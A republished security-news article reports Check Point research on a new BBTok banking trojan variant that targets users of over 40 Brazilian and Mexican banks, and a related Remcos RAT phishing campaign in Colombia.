Skip to content
  Monday 23 June 2025
  • Home
  • Attack
  • Malware
  • Cloud
  • Data
  • Technology
  • World of tech
Trending
September 26, 2023Chinese Hackers TAG-74 Targets South Korean Organizations in a Multi-Year Campaign December 18, 2024Unpatched Cleo Managed File-Transfer Software February 29, 2024AI Leads to Major Breakthroughs in Mobile Games in 2024 August 29, 2024Is a Virtual Contact Center Viable for Busy Companies? February 21, 2024Signal Introduces Usernames, Allowing Users to Keep Their Phone Numbers Private March 24, 2025Rapid7 Gets Truce With Activist Investor, Adds 3 Board Seats February 1, 2024Why the Right Metrics Matter When it Comes to Vulnerability Management April 24, 2025WhatsApp Adds Advanced Chat Privacy to Blocks Chat Exports and Auto-Downloads June 11, 2024OpenAI ex-employees worry about company’s control over their millions of dollars in shares August 28, 2024Super Micro shares fall 19% on filing delay, Hindenburg Research report
  • Home
  • Attack
  • Malware
  • Cloud
  • Data
  • Technology
  • World of tech
  Attack  New Variant of Banking Trojan BBTok Targets Over 40 Latin American Banks
Attack

New Variant of Banking Trojan BBTok Targets Over 40 Latin American Banks

adminadmin—September 22, 20230
FacebookTwitterPinterestLinkedInTumblrRedditVKWhatsAppEmail


Sep 22, 2023THNMalware / Cyber Threat

Banking Trojan BBTok

An active malware campaign targeting Latin America is dispensing a new variant of a banking trojan called BBTok, particularly users in Brazil and Mexico.

“The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number,” Check Point said in research published this week.

The payloads are generated by a custom server-side PowerShell script and are unique for each victim based on the operating system and country, while being delivered via phishing emails that leverage a variety of file types.

BBTok is a Windows-based banking malware that first surfaced in 2020. It’s equipped with features that run the typical trojan gamut, allowing it to enumerate and kill processes, issue remote commands, manipulate keyboard, and serve fake login pages for banks operating in the two countries.

The attack chains themselves are fairly straightforward, employing bogus links or ZIP file attachments to stealthily deploy the banker retrieved from a remote server (216.250.251[.]196) while displaying a decoy document to the victim.

Cybersecurity

But they are also diversified for both Windows 7 and Windows 10 systems, mainly taking steps to evade newly implemented detection mechanisms such as Antimalware Scan Interface (AMSI) that allows for scanning the machine for any threats.

Two other key methods to fly under the radar are the use of living-off-the-land binaries (LOLBins) and geofencing checks to ensure that the targets are only from Brazil or Mexico before serving the malware via the PowerShell script.

Once launched, BBTok establishes connections with a remote server to receive commands to simulate the security verification pages for various banks.

More stories

Google’s New Restore Credentials Tool Simplifies App Login After Android Migration

November 25, 2024

Google Cloud to Enforce Multi-Factor Authentication by 2025 for All Users

November 6, 2024

Securing CI/CD workflows with Wazuh

May 21, 2025

Ukrainian Hacker Suspected to be Behind “Free Download Manager” Malware Attack

September 21, 2023

In impersonating the interfaces of Latin American banks, the goal is to harvest credential and authentication information entered by the users to conduct account takeovers of the online bank accounts.

“What’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from its C2 server, and are not automatically carried out on every infected system,” the company said.

Check Point’s analysis of the malware has revealed a significant improvement to its obfuscation and targeting since 2020, expanding beyond Mexican banks. The presence of Spanish and Portuguese language in the source code as well as in phishing emails offers a hint as to the attackers’ origin.

More than 150 users are estimated to have been infected by BBTok, based on an SQLite database found in the server hosting the payload generation component that records access to the malicious application.

The targeting and the language points to the threat actors likely operating out of Brazil, which continues to be the epicenter of potent financially-focused malware.

UPCOMING WEBINAR

AI vs. AI: Harnessing AI Defenses Against AI-Powered Risks

Ready to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.

Supercharge Your Skills

“Although BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico and Brazil, it’s evident that it is still actively deployed,” Check Point said.

“Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.”

The development comes as the Israeli cybersecurity company detailed a new large-scale phishing campaign that recently targeted over 40 prominent companies across multiple industries in Colombia with an ultimate aim to deploy the Remcos RAT via a multi-stage infection sequence.

“Remcos, a sophisticated ‘Swiss Army Knife’ RAT, grants attackers full control over the infected computer and can be used in a variety of attacks. Common consequences of a Remcos infection include data theft, follow-up infections, and account takeover,” Check Point said.

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.





Source link

FacebookTwitterPinterestLinkedInTumblrRedditVKWhatsAppEmail

admin

Amazon is bringing ads to Prime Video — the ad-free option will cost an extra $2.99 a month
Practical Strategies for a Simplified and Secured Cloud JourneyWebinar.
Related posts
  • Related posts
  • More from author
Attack

Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages

June 21, 20250
Attack

Qilin Ransomware Adds “Call Lawyer” Feature to Pressure Victims for Larger Ransoms

June 20, 20250
Attack

Massive 7.3 Tbps DDoS Attack Delivers 37.4 TB in 45 Seconds, Targeting Hosting Provider

June 20, 20250
Load more

Whoops, you're not connected to Mailchimp. You need to enter a valid Mailchimp API key.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Read also
Data

Free Tools to Test Website Accessibility

June 22, 20250
Data

What the Rise of AI Web Scrapers Means for Data Teams

June 22, 20250
Attack

Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages

June 21, 20250
Malware

Court Ditches HIPAA Reproductive Health Info Privacy Rule

June 21, 20250
Malware

Aflac attack – GovInfoSecurity

June 20, 20250
Malware

AdaCore Merges With CodeSecure for Unified Developer Tools

June 20, 20250
Load more

Recent Posts

  • Free Tools to Test Website Accessibility
  • What the Rise of AI Web Scrapers Means for Data Teams
  • Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages
  • Court Ditches HIPAA Reproductive Health Info Privacy Rule
  • Aflac attack – GovInfoSecurity

    © 2022
    • Home
    • Attack
    • Cloud
    • Data
    • Malware
    • Technology
    • World of tech
    • Privacy
    • Contact